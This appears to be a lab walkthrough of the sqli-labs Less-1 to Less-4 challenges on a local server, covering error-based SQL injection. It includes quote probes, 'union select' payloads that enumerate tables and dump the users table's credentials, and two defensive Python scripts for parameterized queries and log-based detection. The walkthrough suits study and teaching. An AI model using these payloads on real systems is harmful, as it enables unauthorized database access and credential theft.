
GET error-based SQL injection


SQL injection categories

Numeric and string types

GET error-based SQL injection

Change the corresponding id value in the URL to a normal number, a very large number, special characters (single quote, double quote, parentheses) or a backslash \ to probe whether the URL has an injection point.

Here I use the challenges from sqli-labs as examples:

less1

Here I enter ?id=1 in the URL to pass the id parameter. Unlike the index.php?id=1 we wrote before, the filename can be omitted: if nothing precedes the ?, the request goes to the default page, i.e. index.php.

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

Then we enter ?id=1' and an SQL error is returned:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

The error reports ''1'' LIMIT 0,1'. Stripping the outer pair of single quotes that MySQL wraps around the offending fragment leaves '1'' LIMIT 0,1.

We guess that the real SQL statement is:

select login_name,password from admin where id='id' LIMIT 0,1

less2

We enter ?id=1:

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

Then we enter ?id=1' and an SQL error is returned:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

The error reports '' LIMIT 0,1'. Stripping the outer single quotes leaves ' LIMIT 0,1, so the quote we typed is the first character of the fragment.

Guessed SQL statement:

select login_name,password from admin where id=id LIMIT 0,1

less3

We enter ?id=1:

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

Then we enter ?id=1' and an SQL error is returned:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

The error reports ''1'') LIMIT 0,1'. Stripping the outer single quotes leaves '1'') LIMIT 0,1.

Guessed SQL statement:

select login_name,password from admin where id=('id') LIMIT 0,1

After entering ?id=1') --+ we find the error is gone and the page renders normally, which proves our guess is correct.

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

less4

We enter ?id=1:

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

Entering ?id=1' and ?id=1) produces no error, but when we enter ?id=1" we get an SQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

The error reports '"1"") LIMIT 0,1'. Stripping the outer single quotes leaves "1"") LIMIT 0,1.

Guessed SQL statement:

select login_name,password from admin where id=("id") LIMIT 0,1

After entering ?id=1") --+ we find the error is gone and the page renders normally, which proves our guess is correct.

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb
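As an added illustration that is not part of the original post, the following Python script rebuilds the query shapes reconstructed above for less1 (single-quoted), less2 (bare integer) and less3 (single-quoted inside parentheses) against an in-memory SQLite table, and shows why a stray single quote becomes a syntax error only when the id is pasted into the SQL text; the parameterized lookup treats the same input as data. SQLite instead of MySQL, the table contents and the function names are assumptions made for this example (less4's double-quoted form is left out because SQLite reads double quotes as identifiers).

```python
import sqlite3

# Constructed stand-in for sqli-labs' users table (assumption: SQLite in memory, not MySQL).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
conn.commit()

# The query shapes guessed for less1, less2 and less3; {id} is pasted in verbatim,
# exactly as the vulnerable pages do.
TEMPLATES = {
    "less1": "SELECT username, password FROM users WHERE id='{id}' LIMIT 0,1",
    "less2": "SELECT username, password FROM users WHERE id={id} LIMIT 0,1",
    "less3": "SELECT username, password FROM users WHERE id=('{id}') LIMIT 0,1",
}


def vulnerable_lookup(lesson, raw_id):
    """Builds the query by string concatenation.

    Returns ("ok", row_or_None) when the statement parses, or
    ("error", message) when the pasted value breaks the SQL syntax.
    A raw_id of "1'" yields an error for every template: that error
    message is the signal the probing above relies on, and the reason
    error text must never reach the client.
    """
    sql = TEMPLATES[lesson].format(id=raw_id)
    try:
        return "ok", conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "error", str(exc)


def safe_lookup(raw_id):
    """Hardened version: validate the expected shape, then bind a parameter.

    The value never touches the SQL text. "1'" fails the int() check and is
    treated as an id that does not exist, not as a syntax error that leaks
    the structure of the query.
    """
    try:
        id_value = int(raw_id)
    except (TypeError, ValueError):
        return None
    sql = "SELECT username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (id_value,)).fetchone()


if __name__ == "__main__":
    for lesson in TEMPLATES:
        for probe in ("1", "1'"):
            status, detail = vulnerable_lookup(lesson, probe)
            print(f"{lesson} id={probe!r:5} -> {status}: {detail}")
    print("parameterized id='1'  ->", safe_lookup("1"))
    print("parameterized id=\"1'\" ->", safe_lookup("1'"))
```

Running the script prints a row for id=1 and an "unrecognized token" error for id=1' under every concatenated template, while the parameterized lookup returns the row for 1 and None for 1'. The two defensive points are independent: binding parameters removes the injection, and returning a generic error page instead of the database message removes the oracle that makes error-based probing work.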

Exploiting GET error-based SQL injection

Method:

1. Use order by to determine the number of columns.

2. Use a union select query to obtain the table names.

0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3. Use a union select query to obtain the column names.

0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4. Use a union select query to obtain the column values.

0' union select 1,group_concat(username,0x3a,password),3 from users --+
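From the defensive side, the four steps above leave recognisable traces in web-server access logs. The following Python script is an added example, not part of the original post: it parses a few constructed combined-format log lines whose URLs mirror the ones used in this post, and flags the order by probe, union select, access to information_schema, a quote followed by a comment marker, and any non-numeric value in a parameter the application only expects as an integer. The log format, the parameter allow-list, the rule names and the sample entries are all assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines in Apache/Nginx "combined" shape; not real traffic.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2023:12:00:01 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:12:00:02 +0800] "GET /sqli/Less-1/?id=1%27 HTTP/1.1" 200 640',
    '127.0.0.1 - - [10/Oct/2023:12:00:03 +0800] "GET /sqli/Less-2/?id=1%20order%20by%203%20--+ HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:12:00:04 +0800] "GET /sqli/Less-3/?id=1%27)%20--+ HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2023:12:00:05 +0800] "GET /sqli/Less-1/?id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 530',
    '10.0.0.5 - - [10/Oct/2023:12:00:06 +0800] "GET /index.php?page=about HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signatures matched against the URL-decoded query string (assumed rule names).
RULES = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\.", re.I)),
    ("quote-comment", re.compile(r"""['"]\)?\s*(--|#)""")),
]

# Parameters the application only ever expects as integers (assumption).
NUMERIC_PARAMS = {"id"}


def analyze_line(line):
    """Parses one log line; returns request details plus matched rule names, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    decoded = unquote_plus(parts.query)  # %27 -> ' and '+' -> space, so "--+" becomes "-- "
    hits = [name for name, rx in RULES if rx.search(decoded)]
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key in NUMERIC_PARAMS and not value.isdigit():
            hits.append(f"non-numeric-{key}")
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "decoded_query": decoded, "hits": hits}


def scan(lines):
    """Returns only the entries that matched at least one rule, in log order."""
    flagged = []
    for line in lines:
        entry = analyze_line(line)
        if entry and entry["hits"]:
            flagged.append(entry)
    return flagged


if __name__ == "__main__":
    for entry in scan(SAMPLE_LOG):
        print(f'{entry["ts"]} {entry["ip"]} {entry["path"]} -> {", ".join(entry["hits"])}')
        print("    ", entry["decoded_query"])
```

The non-numeric-id rule is the one worth keeping in production: keyword signatures can be evaded with casing and comments, but an integer parameter that arrives with anything other than digits is wrong regardless of what follows, and the same check belongs in the application before the value is bound to the query.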

less1

http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,2,3 --+

Here we find that columns 2 and 3 are echoed on the page, so they can be used to display injected data.

Welcome    Dhakkan
Your Login name:2
Your Password:3

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,user(),database() --+

Welcome    Dhakkan
Your Login name:root@localhost
Your Password:security

After substituting user() and database(), we find the logged-in user is root@localhost and the database is security.

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,version(),database() --+

Welcome    Dhakkan
Your Login name:5.5.47 version 5.5.47
Your Password:security

We can see the database version is 5.5.47, which has the information_schema database defined by default.

Get the table names:

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

group_concat(table_name) shows the table names:

Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

Get the column names:

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

Get the column values:

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+

Welcome    Dhakkan
Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3

less2 (integer injection)

Use order by to guess the column count:

http://127.0.0.1/sqli/Less-2/?id=1%20order%20by%203%20--+

order by 3 succeeds, while order by 4 fails:

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

Find the injection point:

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,2,3 --+

Welcome    Dhakkan
Your Login name:2
Your Password:3

Query the database version:

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,version(),3 --+

Database version: 5.5.47

Welcome    Dhakkan
Your Login name:5.5.47
Your Password:3

Get the table names:

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

Get the column names:

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

Get the column values:

http://127.0.0.1/sqli/Less-2/?id=0 union select 1,group_concat(username,0x3a,password),3 from users --+

Welcome    Dhakkan
Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3

less3

http://127.0.0.1/sqli/Less-3/?id=1') order by 3 --+

order by 3 succeeds, while order by 4 fails:

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

Find the injection point:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,2,3 --+

Welcome    Dhakkan
Your Login name:2
Your Password:3

Get the database version:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,version(),3 --+

Welcome    Dhakkan
Your Login name:5.5.47
Your Password:3

Get the table names:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

Get the column names:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

Get the column values:

http://127.0.0.1/sqli/Less-3/?id=0') union select 1,group_concat(username,0x3a,password),3 from users --+

Welcome    Dhakkan
Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3

less4

http://127.0.0.1/sqli/Less-4/?id=1") order by 3 --+

order by 3 succeeds, while order by 4 fails:

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

Find the injection point:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,2,3 --+

Welcome    Dhakkan
Your Login name:2
Your Password:3

Get the database version:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,version(),3 --+

Welcome    Dhakkan
Your Login name:5.5.47
Your Password:3

Get the table names:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() --+

Welcome    Dhakkan
Your Login name:emails,referers,uagents,users
Your Password:3

Get the column names:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name ='users' --+

Welcome    Dhakkan
Your Login name:id,username,password
Your Password:3

Get the column values:

http://127.0.0.1/sqli/Less-4/?id=0") union select 1,group_concat(username,0x3a,password),3 from users --+

Welcome    Dhakkan
Your Login name:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
Your Password:3